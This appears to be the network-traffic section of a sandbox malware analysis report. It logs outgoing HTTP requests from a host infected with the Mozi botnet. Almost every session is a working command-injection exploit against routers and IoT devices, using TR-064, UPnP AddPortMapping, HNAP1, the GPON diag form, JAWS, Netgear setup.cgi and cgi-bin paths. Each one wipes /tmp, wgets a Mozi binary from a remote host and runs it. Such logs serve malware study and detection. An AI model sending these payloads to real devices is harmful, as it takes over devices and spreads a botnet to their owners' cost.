                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        59192.168.2.2339810157.80.252.2552869
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579873085 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: /
                                                                        User-Agent: Hello-World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        60192.168.2.2332874120.168.131.758443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579890966 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        61192.168.2.2344724175.63.134.348443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579916954 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        62192.168.2.235651256.75.49.17380
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579941034 CET279OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                        User-Agent: Hello, world
                                                                        Host: 56.75.49.173:80
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                        Connection: keep-alive


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        63192.168.2.235681685.36.32.1780
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579977036 CET800OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 85.36.32.17:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        64192.168.2.234493048.71.73.508080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.579992056 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:8080
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        65192.168.2.235536016.250.88.88080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580017090 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        66192.168.2.234957637.133.196.20449152
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580054998 CET932OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                        Host: 37.133.196.204:49152
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        67192.168.2.235145627.126.80.6181
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580080986 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        68192.168.2.2338960102.154.96.7880
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580096006 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:80
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        69192.168.2.2333780222.96.144.1680
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580127001 CET280OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                        User-Agent: Hello, world
                                                                        Host: 222.96.144.16:80
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                        Connection: keep-alive


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        70192.168.2.23351903.23.235.1518443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580149889 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        71192.168.2.2358216143.101.55.9780
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580182076 CET802OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 143.101.55.97:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        72192.168.2.2350436216.190.220.5480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580212116 CET281OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                        User-Agent: Hello, world
                                                                        Host: 216.190.220.54:80
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                        Connection: keep-alive


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        73192.168.2.234919468.42.36.21080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580235004 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:80
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        74192.168.2.234992450.191.49.1718080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580265999 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:8080
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        75192.168.2.2340472197.142.218.1368080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580285072 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        76192.168.2.235743657.194.223.2415555
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580327034 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:5555
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        77192.168.2.234175433.11.207.17380
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580351114 CET802OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 33.11.207.173:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        78192.168.2.234036254.52.118.2198443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580370903 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        79192.168.2.2354824215.161.47.22080
                                                                        TimestampBytes transferredDirectionData
